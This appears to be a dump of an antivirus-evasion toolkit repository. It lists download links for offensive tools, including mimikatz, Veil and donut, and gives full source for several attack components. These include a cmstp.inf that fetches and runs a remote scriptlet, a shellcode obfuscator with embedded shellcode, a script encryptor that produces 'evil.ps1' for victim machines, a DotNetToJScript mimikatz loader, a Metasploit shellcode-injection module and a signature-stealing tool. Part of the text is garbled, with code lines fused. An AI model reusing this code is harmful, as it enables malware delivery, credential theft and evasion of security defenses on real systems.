https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Invoke-Obfuscation.zip

/tools/ProcessInjection.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/ProcessInjection.zip

/tools/ReflectiveDLLInjection.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/ReflectiveDLLInjection.zip

/tools/SharpCradle.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/SharpCradle.zip

/tools/ShellcodeWrapper.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/ShellcodeWrapper.zip

/tools/SimpleShellcodeInjector.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/SimpleShellcodeInjector.zip

/tools/Veil-Catapult.tar.gz:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Veil-Catapult.tar.gz

/tools/Win恶意软件行为分析工具/Autoruns_v13.7.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/Autoruns_v13.7.zip

/tools/Win恶意软件行为分析工具/IceSword122cn.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/IceSword122cn.zip

/tools/Win恶意软件行为分析工具/PCHunter_free_1.51.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/PCHunter_free_1.51.zip

/tools/Win恶意软件行为分析工具/PowerToolx32_v4.8.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/PowerToolx32_v4.8.zip

/tools/Win恶意软件行为分析工具/PowerToolx64_v2.0.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/PowerToolx64_v2.0.zip

/tools/Win恶意软件行为分析工具/ProcessExplorer_v16.20.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/ProcessExplorer_v16.20.zip

/tools/Win恶意软件行为分析工具/ProcessMonitor_v3.32.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/ProcessMonitor_v3.32.zip
/tools/Win恶意软件行为分析工具/Win64AST_1.10Beta7.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/Win64AST_1.10Beta7.zip

/tools/Win恶意软件行为分析工具/火绒剑独立版 0.1.0.36.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/Win恶意软件行为分析工具/火绒剑独立版 0.1.0.36.zip

/tools/avet.tar.gz:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/avet.tar.gz

/tools/bat2exe.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/bat2exe.zip

/tools/bin2hex.exe:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/bin2hex.exe

/tools/cmstp.inf:

```ini
;cmstp.exe /s cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/powersct.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
```

/tools/donut_v0.9.2_release.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/donut_v0.9.2_release.zip

/tools/encode_shellcode.py:

```python
from capstone import *
from keystone import *

def assemble(code):
    try:
        ks = Ks(KS_ARCH_X86, KS_MODE_32)
        encoding, count = ks.asm(code)
        return [hex(i) for i in encoding]
    except KsError as e:
        print(e)
        return -1

def byteoffset2index(offset):
    temp=offset
    a=0
    for i in md.disasm(CODE, 0x0):
        temp-=len(i.bytes)
        a+=1
        if temp==0:
            return a

if __name__ == "__main__":
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    controlflow=["jmp","jz","jnz","je","jne","call","jl","ja","loop","jecxz","jle","jge","jg","jp","jnl"]
    registers=["eax","ebx","edx","ebp","esp","edi","esi"]
    #CODE = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a\x02\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85\xc0\x75\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x2d\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
    CODE = b"\xb8\xc9\x58\xa0\x0c\xd9\xce\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x98\x83\xeb\xfc\x31\x43\x10\x03\x43\x10\x2b\xad\x7d\xc9\x11\x44\xae\xab\x14\x80\x3a\x68\x22\x6a\xf0\xb9\x7b\x1a\xc7\x69\x61\x1e\x78\x90\x16\xc8\x84\x46\xe7\x67\x22\x06\xdf\x47\xbe\xba\x30\x83\x99\x7a\x9a\x68\x8b\xe4\xc3\x14\xcf\x32\xc7\xcd\xbd\xe7\xbc\xd2\xfe\x87\xb9\xfa\x81\x4b\x98\x37\xca\x5d\xf5\x98\x2f\x3c\x01\x1d\x54\x49\xeb\xc6\x32\xe7\x5d\x9a\x41\xb5\x82\x8a\x4c\x40\x33\x9a\xf6\xcf\xb7\xfd\x6e\xe3\xe2\xa2\xbc\x17\x20\xd4\xa8\xcb\x4e\x31\x93\x29\x22\x2b\xb8\x0c\x3c\x17\x9f\x5f\x8b\x20\x9e\xdc\x2c\xb0\x36\xe1\xeb\xff\xe9\xea\xf4\x29\x7a\xeb\x5b\x24\xb6\x30\x51\xa8\x29\x22\xed\x0f\xb4\x10\x94\x3a\xde\x6f\x4f\x62\xc6\x36\x1c\x83\x61\x34\x67\xb1\xda\xc9\x88\x92\x13\x66\x6c\x92\x54\xc6\x35\x53\xc2\x8d\x12\x77\xef\xfa\x45\x4e\x37\x32\x43\xf3\xae\x85\x57\x14\xe1\x6e\xf9\xb7\x26\xac\xf6\x7c\x01\xa2\x27\x69\x55\xbd\xb6\x1a\x31\x47\x23\x15\xad\xc9\xc9\xc6\xca\x22\x9d\xb5\xf1\x82\xe5\x35\x03\x15\x46\xd7\xde\x19\x1b\x32\x9a\x4a\x57\xb0\xed\xa7\x6c\x77\x0c\xf9\x30\x20\x17\x9f\xe2\xf8\xca\x2c\xa4\x80\x77\x9d\x4c\x67\x1f\xc5\xea\xd9\x01\x9a\x22\xec\xde\x49\xdc\xab\xda\x6c\x33\xfc\x21\x1d\x2a\x61\x66\xa6\x5c\xa6\x3b\xc9\xc4\xa3\xfc\x8d\xa8\xc2\x62\x13\xe5\xbc\x55\xa5\x13\xca\xec\xe5\x60\xe5\x6d\xa9\x4b\xd4\x9d\x7f\x21\x55\xd0\xc0\x3d\x5a\x6b\x5a\x8d\x0f\xe4\xcf\x1f\x90\xab\xf8\x22\x35\xd3\xda\x7b\x58\x3b\x79\x6f\xe8\x0a\xa3\xdf\x70\xfc\x3d\xb3\xa5\x1d\x8e\x4f\x3a\xe7\xe9\x0c\x96\x25\xe0\x1e\x17\x7b\xcc\xfb\xc7\x5c\xdc\x4e\x0d\x8f\x21\xdb\xe2\x56\xc6\xb8\x3e\xa2\xa7\x20\x55\x2e\xbc\x03\x29\x77\xd4\x09\x0a\x54\x42\x26\xcc\x08\xeb\x8a\x84\x8e\x54\xa9\xf3\x48\xd0\xb6\xfc\x03\x39\xe4\xe7\x04\x56\x4e\x9b\x21\x37\x68\x40\x26\xc0\x7d\xd7\x1c\x23\xab\x91\x30\x59\x41\x3a\xae\x7a\xff\x77\x26\x29\xda\x42\xc6\xf6\x05\x0c\x2c\x72\x67\x06\x7b\xfa\x53\x0b\xb0\xa6\x60\xff\xa8\x94\x7e\x2c\x9f\x76\x12\x5c\xa9\x8f\x47\xc6\xa4\x64\x6e\x87\x2a\xab\x1b\xc2\xa2\xde\x29\x1d\x48\xb4\x82\x2a\x5a\x38\x12\x0d\xbf\x82\x1c\xd8\xfc\x9b\x42\x35\x
```
d7\x40\xf4\x4e\x41\x54\xaf\xde\xd2\xf8\x0f\x75\x9a\x6a\x70\x5a\xc4\x29\xe2\xa9\xec\xc8\x55\x07\xc4\x04\x2e\x89\x02\xf2\xff\x19\x8a\xab\x04\x63\x25\x63\x41\xb7\x99\x66\x42\xad\x13\x6e\x9b\xb1\x3f\xe6\x30\x02\xed\x4f\x96\x66\x1c\x37\xbc\x77\xc1\xf6\x8f\xfd\xb1\x2a\x50\x62\xcf\x96\x5f\x14\xd4\xa2\xcf\x09\x07\xeb\x2a\xbb\xce\x2e\x27\x16\x49\x03\x68\x3b\x1b\x7e\x7a\x85\xf7\x1b\xc1\x61\x25\xc8\xe3\xe3\xae\x14\x86\x8e\xf6\xad\x1b\x5a\x97\x5f\x87\x24\xf1\xee\x08\x49\x48\x39\x2e\xad\x55\xe9\x4c\x34\x5d\x3b\x0b\xde\x09\xa6\x54\x2f\x0b\x59" 26 | asm=";".join([i.mnemonic+" "+i.op_str for i in md.disasm(CODE, 0x0)]) 27 | asmarray=asm.split(";") 28 | length=len(asmarray) 29 | tags=[] 30 | for i in range(0,len(asmarray)): 31 | for mnemonic in controlflow: 32 | if (mnemonic in asmarray[i]): 33 | tags.append(i) 34 | mask=[] 35 | for i in range(0,len(tags)): 36 | for reg in registers: 37 | if (reg in asmarray[tags[i]]): 38 | mask.append(tags[i]) 39 | [tags.remove(i) for i in mask] 40 | tagins=[asmarray[i] for i in tags] 41 | revision=[] 42 | for i in range(0,len(tagins)): 43 | b=tagins[i][tagins[i].index("0x"):] 44 | n=byteoffset2index(int(b,16)) 45 | revision.append(n) 46 | revision_unique=list(set(revision)) 47 | for i in range(0,len(revision_unique)): 48 | asmarray[revision_unique[i]]="a"+str(revision_unique[i])+": "+asmarray[revision_unique[i]] 49 | tagins=[asmarray[i] for i in tags] 50 | for i in range(0,len(tags)): 51 | asmarray[tags[i]]=tagins[i][:tagins[i].index("0x")]+"a"+str(revision[i]) 52 | obfuscation="nop" 53 | code=obfuscation+";"+(";"+obfuscation+";").join(asmarray) 54 | print("unsigned char buf[]="+str(assemble(code)).replace("\'","").replace("[","{").replace("]","}")+";") 55 | #print("unsigned char buf[]="+str(assemble(code)[::-1]).replace("\'","").replace("[","{").replace("]","}")+";") -------------------------------------------------------------------------------- /tools/go-shellcode.zip: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/go-shellcode.zip
--------------------------------------------------------------------------------
/tools/green-hat-suite.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/green-hat-suite.tar.gz
--------------------------------------------------------------------------------
/tools/gsl-sc-loader.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/gsl-sc-loader.zip
--------------------------------------------------------------------------------
/tools/impacket.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/impacket.tar.gz
--------------------------------------------------------------------------------
/tools/mimikatz/Convert-BinaryToString.ps1:
--------------------------------------------------------------------------------
function Convert-BinaryToString {
    [CmdletBinding()] param (
        [string] $FilePath
    )
    try {
        $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
    }
    catch {
        throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
    }
    if ($ByteArray) {
        $Base64String = [System.Convert]::ToBase64String($ByteArray);
    }
    else {
        throw '$ByteArray is $null.';
    }
    Write-Output -InputObject $Base64String
}
--------------------------------------------------------------------------------
/tools/mimikatz/Out-EncryptedScript.ps1:
--------------------------------------------------------------------------------
function Out-EncryptedScript
{
<#
.SYNOPSIS

Encrypts text files/scripts.

PowerSploit Function: Out-EncryptedScript
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Out-EncryptedScript will encrypt a script (or any text file for that
matter) and output the results to a minimally obfuscated script -
evil.ps1 by default.

.PARAMETER ScriptPath

Path to this script

.PARAMETER Password

Password to encrypt/decrypt the script

.PARAMETER Salt

Salt value for encryption/decryption. This can be any string value.

.PARAMETER InitializationVector

Specifies a 16-character initialization vector to be used. This
is randomly generated by default.

.EXAMPLE

C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty

Description
-----------
Encrypt the contents of this file with a password and salt. This will
make analysis of the script impossible without the correct password
and salt combination. This command will generate evil.ps1 that can be
dropped onto the victim machine. It only consists of a decryption
function 'de' and the base64-encoded ciphertext.

.EXAMPLE

C:\PS> [String] $cmd = Get-Content .\evil.ps1
C:\PS> Invoke-Expression $cmd
C:\PS> $decrypted = de password salt
C:\PS> Invoke-Expression $decrypted

Description
-----------
This series of instructions assumes you've already encrypted a script
and named it evil.ps1. The contents are then decrypted and the
unencrypted script is called via Invoke-Expression

.NOTES

This command can be used to encrypt any text-based file/script
#>

    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $ScriptPath,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $Password,

        [Parameter(Position = 2, Mandatory = $True)]
        [String]
        $Salt,

        [Parameter(Position = 3)]
        [ValidateLength(16, 16)]
        [String]
        $InitializationVector = ((1..16 | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''),

        [Parameter(Position = 4)]
        [String]
        $FilePath = '.\evil.ps1'
    )

    $AsciiEncoder = New-Object System.Text.ASCIIEncoding
    $ivBytes = $AsciiEncoder.GetBytes($InitializationVector)
    # While this can be used to encrypt any file, it's primarily designed to encrypt itself.
    [Byte[]] $scriptBytes = Get-Content -Encoding Byte -ReadCount 0 -Path $ScriptPath
    # Key derivation is PBKDF1-style (PasswordDeriveBytes, SHA1, only 2 iterations) into a 16-byte
    # two-key 3DES key, so the password is the only secret and the work factor against guessing is negligible.
    $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2)
    $Key = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
    $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC
    [Byte[]] $KeyBytes = $DerivedPass.GetBytes(16)
    $Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes)
    $MemStream = New-Object System.IO.MemoryStream
    $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
    $CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length)
    $CryptoStream.FlushFinalBlock()
    $CipherTextBytes = $MemStream.ToArray()
    $MemStream.Close()
    $CryptoStream.Close()
    $Key.Clear()
    $Cipher = [Convert]::ToBase64String($CipherTextBytes)

    # Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function
    $Output = @"
function de([String] `$b, [String] `$c)
{
    `$a = "$Cipher";
    `$encoding = New-Object System.Text.ASCIIEncoding;
    `$dd = `$encoding.GetBytes("$InitializationVector");
    `$aa = [Convert]::FromBase64String(`$a);
    `$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes(`$b, `$encoding.GetBytes(`$c), "SHA1", 2);
    [Byte[]] `$e = `$derivedPass.GetBytes(16);
    `$f = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;
    `$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
    [Byte[]] `$h = New-Object Byte[](`$aa.Length);
    `$g = `$f.CreateDecryptor(`$e, `$dd);
    `$i = New-Object System.IO.MemoryStream(`$aa, `$True);
    `$j = New-Object System.Security.Cryptography.CryptoStream(`$i, `$g, [System.Security.Cryptography.CryptoStreamMode]::Read);
    `$r = `$j.Read(`$h, 0, `$h.Length);
    `$i.Close();
    `$j.Close();
    `$f.Clear();
    if ((`$h.Length -gt 3) -and (`$h[0] -eq 0xEF) -and (`$h[1] -eq 0xBB) -and (`$h[2] -eq 0xBF)) { `$h = `$h[3..(`$h.Length-1)]; }
    return `$encoding.GetString(`$h).TrimEnd([Char] 0);
}
"@

    # Output decrypt function and ciphertext to evil.ps1
    Out-File -InputObject $Output -Encoding ASCII $FilePath

    Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)"
}
--------------------------------------------------------------------------------
/tools/mimikatz/ResHacker.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/ResHacker.zip
--------------------------------------------------------------------------------
/tools/mimikatz/mimikatz.msi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/mimikatz.msi
--------------------------------------------------------------------------------
/tools/mimikatz/mimikatz.sct:
--------------------------------------------------------------------------------
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    >

    <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    <!-- DFIR -->
    <!-- .sct files are downloaded and executed from a path like this -->
    <!-- Though, the name and extension are arbitrary.. -->
    <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
    <!-- Based on current research, no registry keys are written, since call "uninstall" -->


    <!-- Proof Of Concept - Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[

            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

        ]]>
    </script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
    <![CDATA[
        // Mimikatz Loader
        // Built with DotNetToJScript.
        function Exec()
        {
            function setversion() {
                new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
            }
            function debug(s) {}
            function base64ToStream(b) {
                var enc = new ActiveXObject("System.Text.ASCIIEncoding");
                var length = enc.GetByteCount_2(b);
                var ba = enc.GetBytes_4(b);
                var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
                ba = transform.TransformFinalBlock(ba, 0, length);
                var ms = new ActiveXObject("System.IO.MemoryStream");
                ms.Write(ba, 0, (length / 4) * 3);
                ms.Position = 0;
                return ms;
            }

            var serialized_obj = ""; // base64-encoded serialized .NET object (long blob) omitted from this listing
            var entry_class = 'TestClass';

            try {
                setversion();
                var stm = base64ToStream(serialized_obj);
                var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
                var al = new 
    ActiveXObject('System.Collections.ArrayList');
    var d = fmt.Deserialize_2(stm);
    al.Add(undefined);
    var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);

} catch (e) {
    debug(e.message);
}

}

]]>
</script>

</scriptlet>
--------------------------------------------------------------------------------
/tools/mimikatz/mimikatz_trunk_2.2.0.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/mimikatz_trunk_2.2.0.zip
--------------------------------------------------------------------------------
/tools/mimikatz/procdump.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/procdump.exe
--------------------------------------------------------------------------------
/tools/mimikatz/procdump64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/procdump64.exe
--------------------------------------------------------------------------------
/tools/mimikatz/shellcode_inject.rb:
--------------------------------------------------------------------------------
require 'msf/core/post/common'
require 'msf/core/post/windows/reflective_dll_injection'

class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super( update_info( info,
      'Name'         => 'Windows Manage Memory Shellcode Injection Module',
      'Description'  => %q{
        This module will inject into the memory of a process a specified shellcode.
      },
      'License'      => MSF_LICENSE,
      'Author'       => [ 'phra <https://iwantmore.pizza>' ],
      'Platform'     => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptPath.new('SHELLCODE', [true, 'Path to the shellcode to execute']),
        OptInt.new('PID', [false, 'Process Identifier of the process to inject the shellcode into. (0 = new process)', 0]),
        OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', true]),
        OptBool.new('INTERACTIVE', [true, 'Interact with the process', true]),
        OptBool.new('HIDDEN', [true, 'Spawn a hidden process', true]),
        OptEnum.new('BITS', [true, 'Set architecture bits', '64', ['32', '64']])
      ])
  end

  # Run method for when the run command is issued
  def run

    # sysinfo is only on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

    # Set variables
    shellcode = IO.read(datastore['SHELLCODE'])
    pid = datastore['PID']
    bits = datastore['BITS']
    p = nil
    if bits == '64'
      bits = ARCH_X64
    else
      bits = ARCH_X86
    end

    if pid == 0 or not has_pid?(pid)
      p = create_temp_proc(bits)
      print_status("Spawned process #{p.pid}")
    else
      print_status("Opening process #{p.pid}")
      p = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
    end

    if bits == ARCH_X64 and client.arch == ARCH_X86
      print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
      print_error("Migrate to an x64 process and try again.")
      return false
    elsif arch_check(bits, p.pid)
      inject(shellcode, p)
    end
  end

  # Checks that the architecture of the payload and the PID are compatible
  # Returns true if they are, false if they are not
  def arch_check(bits, pid)
    # get the pid arch
    client.sys.process.processes.each do |p|
      # Check payload arch
      if pid == p["pid"]
        print_status("Process found checking Architecture")
        if bits == p['arch']
          print_good("Process is the same architecture as the payload")
          return true
        else
          print_error("The PID #{ p['arch']} and Payload #{bits} architectures are different.")
          return false
        end
      end
    end
  end

  # Creates a temp notepad.exe to inject the payload into, given the payload architecture
  # Returns the process object
  def create_temp_proc(bits)
    windir = client.sys.config.getenv('windir')
    # Select path of executable to run depending on the architecture
    if bits == ARCH_X86 and client.arch == ARCH_X86
      cmd = "#{windir}\\System32\\notepad.exe"
    elsif bits == ARCH_X64 and client.arch == ARCH_X64
      cmd = "#{windir}\\System32\\notepad.exe"
    elsif bits == ARCH_X64 and client.arch == ARCH_X86
      cmd = "#{windir}\\Sysnative\\notepad.exe"
    elsif bits == ARCH_X86 and client.arch == ARCH_X64
      cmd = "#{windir}\\SysWOW64\\notepad.exe"
    end

    proc = client.sys.process.execute(cmd, nil, {
      'Hidden' => datastore['HIDDEN'],
      'Channelized' => datastore['CHANNELIZED'],
      'Interactive' => datastore['INTERACTIVE']
    })

    return proc
  end

  def inject(shellcode, p)
    print_status("Injecting shellcode into process ID #{p.pid}")
    begin
      print_status("Allocating memory in process #{p.pid}")
      mem = inject_into_process(p, shellcode)
      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{shellcode.length} byte shellcode")
      p.thread.create(mem, 0)
      print_good("Successfully injected payload into process: #{p.pid}")

      if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
        print_status("Interacting")
        client.console.interact_with_channel(p.channel)
      elsif datastore['CHANNELIZED']
        print_status("Retrieving output")
        data = p.channel.read
        print_line(data) if data
      end
    rescue ::Exception => e
      print_error("Failed to inject Payload to #{p.pid}!")
      print_error(e.to_s)
    end
  end
end
--------------------------------------------------------------------------------
/tools/mimikatz/sigthief.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# LICENSE: BSD-3
# Copyright: Josh Pitts @midnite_runr

import sys
import struct
import shutil
import io
from optparse import OptionParser


def gather_file_info_win(binary):
    """
    Borrowed from BDF...
    I could just skip to certLOC... *shrug*
    """
    flItms = {}
    binary = open(binary, 'rb')
    binary.seek(int('3C', 16))
    flItms['buffer'] = 0
    flItms['JMPtoCodeAddress'] = 0
    flItms['dis_frm_pehdrs_sectble'] = 248
    flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
    # Start of COFF
    flItms['COFF_Start'] = flItms['pe_header_location'] + 4
    binary.seek(flItms['COFF_Start'])
    flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
    binary.seek(flItms['COFF_Start'] + 2, 0)
    flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
    flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
    binary.seek(flItms['COFF_Start'] + 16, 0)
    flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
    flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
    # End of COFF
    flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20

    # if flItms['SizeOfOptionalHeader']:
    # Begin Standard Fields section of Optional Header
    binary.seek(flItms['OptionalHeader_start'])
    flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
    flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
    flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
    flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
    flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
    flItms['SizeOfUninitializedData'] = struct.unpack("<I", binary.read(4))[0]
    flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
    flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
    flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
    if flItms['Magic'] != 0x20B:
        flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
    # End Standard Fields section of Optional Header
    # Begin Windows-Specific Fields of Optional Header
    if flItms['Magic'] == 0x20B:
        flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
    else:
        flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
    flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
    flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
    flItms['MajorOperatingSystemVersion'] = struct.unpack('<H', binary.read(2))[0]
    flItms['MinorOperatingSystemVersion'] = struct.unpack('<H', binary.read(2))[0]
    flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
    flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
    flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
    flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
    flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
    flItms['SizeOfImageLoc'] = binary.tell()
    flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
